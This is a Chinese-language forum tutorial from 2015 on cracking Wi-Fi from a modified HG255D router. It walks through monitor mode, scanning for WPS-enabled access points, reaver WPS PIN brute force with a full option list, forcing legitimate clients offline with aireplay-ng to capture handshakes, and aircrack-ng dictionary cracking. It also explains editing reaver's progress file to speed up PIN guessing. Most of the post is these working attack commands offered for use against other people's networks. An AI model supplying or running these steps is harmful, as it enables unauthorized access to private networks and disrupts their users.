|
本帖最后由 xulouliu 于 2015-2-13 18:28 编辑
HG255D PIN 教程 (含固件+命令+注意事项)
我自己折腾了好久才差不多都搞懂的!
重新整理过的!
设备:HG255D 改散热 改64M内存 改双天线一台
TOTOLINK N200UA 3070芯片无线网卡一个
SSH连接工具 PuTTY
路由管理工具 WinScp
这两个工具自己去连接啊,
HG255D刷的是HG255D-20130822-OP-PIN码专用 这个
/root 目录是保存reaver Pin的进度的,XX:XX:XX:XX:XX.wpc
---------------------------------------
-加载screen 让后面的操作都在后台操作 =
= screen 使用方法 =
= screen -ls #显示screen列表 =
= screen -r id #进入会话(id编号) =
= 这是用到的两个命令,新建PUTTY, =
= 登陆后直接输入:screen-ls =
= 就会看到你正在运行的程序编号 =
= screen -r id 进入会话(id是编号) =
-----------------------------------------------------上面是官方介绍,进入时候
screen
恢复时候
screen -r
如果出现下图,类似,运行
screen -r 数字
自己对应起来不要搞错了,[一般]内置的是wlan0 外置的wlan1
-----------------------------------------------------------------------------------------------------------------------
= screen #进入后台运行 =
= ifconfig -a #查看可用网卡 =
= ifconfig wlan1 up #加载 wlan1 网卡 (查对MAC wlan1 是我挂载的网卡) =
= ifconfig wlan1 down #这个一定要执行,要不然跟我以前一样,只能搜索到一个频道的信号 =
= airmon-ng start wlan1 #开启监听模式 激活到 mon0 端口 =
= airodump-ng mon0 #扫描 SSID 信号列表 ctrl+c 停止 =
= wash -i mon0 -C #扫描开启WPS的信号 =
= #这个命令有的时候可以能出现开启了WPS的信号, =
= #有的时候不显示,挂的卡不同,有可能也会出现, =
= #有的时候显示有的时候不显示 =
= CTRL+C #停止扫描 SSID =
-----------------------------------------------------------------------------------------------------------------------
在执行了airodump-ng mon0后会显示很多,
这里我说一定54e后面有“点”的才是开启了WPS的,要不然没用哦
reaver -i mon0 -b MAC -a -S -v -c 频道
如果知道前4为可以用下面的命令来
reaver –i mon0 –b MAC –a –S –v –p XXXX (XXXX为前4位PIN码)
参数详解
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
必须参数 @
-i, 网卡的监视接口,通常是mon0 @
-b, AP的MAC地址 @
@
可选参数 @
-m 指定本机MAC地址 @
-e 路由器的ESSID,一般不用指定 @
-c 信号的频道,如果不指定会自动扫描 @
-o 输出日志文件 @
-s 恢复进度文件 @
-C pin成功后执行命令 @
-D 设置reaver成Daemon @
-a 对目标AP自动检测高级参数 @
-f 禁止频道跳转 @
-5 使用5G频道 @
-v 显示不重要警告信息 @
-vv 显示更多的不重要警告信息 @
-q 只显示关键信息 @
-h, 显示帮助 @
@
高级选项 @
-p, 使用指定的4位或者8位pin码 @
-d, pin间延时,默认1秒 @
-l, AP锁定WPS后等待时间 @
-g, 最大pin次数 @
-x, 10次意外失败后等待时间,默认0秒 @
-r, 每x次pin后等待y秒 @
-t, 收包超时,默认5秒 @
-T, M5/M7超时,默认0.2秒 @
-A, 不连入AP(连入过程必须有其他程序完成) @
-N, 不发送NACK信息(如果一直pin不动,可以尝试这个参数) @
-S, 使用小DH关键值提高速度(推荐使用) @
-L, 忽略目标AP报告的锁定状态 @
-E, 每当收到EAP失败包就终止WPS进程 @
-n, 对目标AP总是发送NACK,默认自动 @
-w, 模拟win7注册,默认关闭 @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
常见问题:
PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。
AP关闭了WPS、或者没有QSS滴,会出现WARNING: Failed to associate with XX:XX:XX (ESSID: XXXX)
HG255D抓包跑包
airodump-ng -c (信道) --bssid (AP Mac) -w output mon0(抓cap包)
airodump-ng -c (信道) --bssid (AP Mac) -w /mnt/sda1/output mon0(抓cap包放在U盘,U盘直接插上路由系统会自动加载)
aireplay-ng -0 1 -a (AP Mac) -c (合法的客户端)
mon0往已经连接到ap的一个客户端伪造一个离线包,
使其离线重连以便捕捉handshake.注意要收到ACK,才表明被攻击客户端收到,才会下线;发送离线不宜过密过多。
监听捕捉另外一客户端与ap之间的连接,
上方出现WPA handshake: xx:xx:xx:xx........为成功获得握手包也可以使用发下命令来测试是否有握手包
aircrack-ng -w /mnt/sda1/password.TXT -b AP Mac
/mnt/sda1/output*.cap (password.TXT是字典)
怎么保存进度,恢复进度
查看,修改PIN开始的数字
CTRL+C后看/root目录
将mac地址.wpc 备份后,下次可以继续使用。
wpc结构
0 //这个地方是说它的前4位PIN码的进度位置数 前四位对的话会直接跳到90%
0 //这个地方是说后3位PIN数的已经运行测试位置数
0 //0时没有找到,当为1时找到前四位,当为2时全部找到。
1234
0123
3333
.......
.......
9999
003
.....
.....
999
所以前四位很重要,将已经知道的前四们放在最前面会提高你的PIN速度,
我们也可以手动修改wpc文件第一行,如我们要从3000开始pin你可以将它
修改为3004,这样它就会从3000开始PIN了。当我们在PIN时只要你记住了
前四位,你下载用软件修改WPC文件就可了。
最后提供网友优化WPC文件, PINcode-MAC.rar
保存进度直接下载就可以了。
恢复进度就上传咯
关机,/ROOT目录下的东西不会丢哦
就到这里吧
含PIN专用固件+命令+工具+注意事项见网盘百度网盘有点抽风,直接点连接显示连接被取消分享了,
各位还是复制到地址栏访问吧!
链接:http://pan.baidu.com/s/1mgvEEPM 密码:ntqp2015年2月13日更新连接
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
×
评分
-
查看全部评分
|